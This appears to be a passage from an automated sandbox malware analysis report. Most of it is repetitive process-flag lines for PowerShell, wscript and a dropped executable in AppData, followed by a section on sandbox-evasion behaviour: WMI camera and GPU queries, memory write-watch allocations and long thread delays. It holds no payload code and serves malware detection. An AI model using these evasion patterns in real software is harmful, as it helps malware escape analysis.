                        Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Memory allocated: 730000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Memory allocated: 1A590000 memory reserve | memory write watch
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Memory allocated: 9C0000 memory reserve | memory write watch
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Memory allocated: 1A540000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Code function: 8_2_00007FFD9BAA8180 sldt word ptr [eax]
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 600000
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 599872
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 599593
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 3600000
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 598828
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 598437
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 597781
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 597203
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 596843
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 596609
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 596265
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 596073
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 595850
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 595531
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 595156
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 594922
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 594672
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 594312
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 594000
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 593656
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 593156
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 592859
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 592437
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 592000
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 591484
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 591160
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 590937
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 590562
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 590265
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 589828
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 589000
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 588656
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 300000
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 588343
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 587859
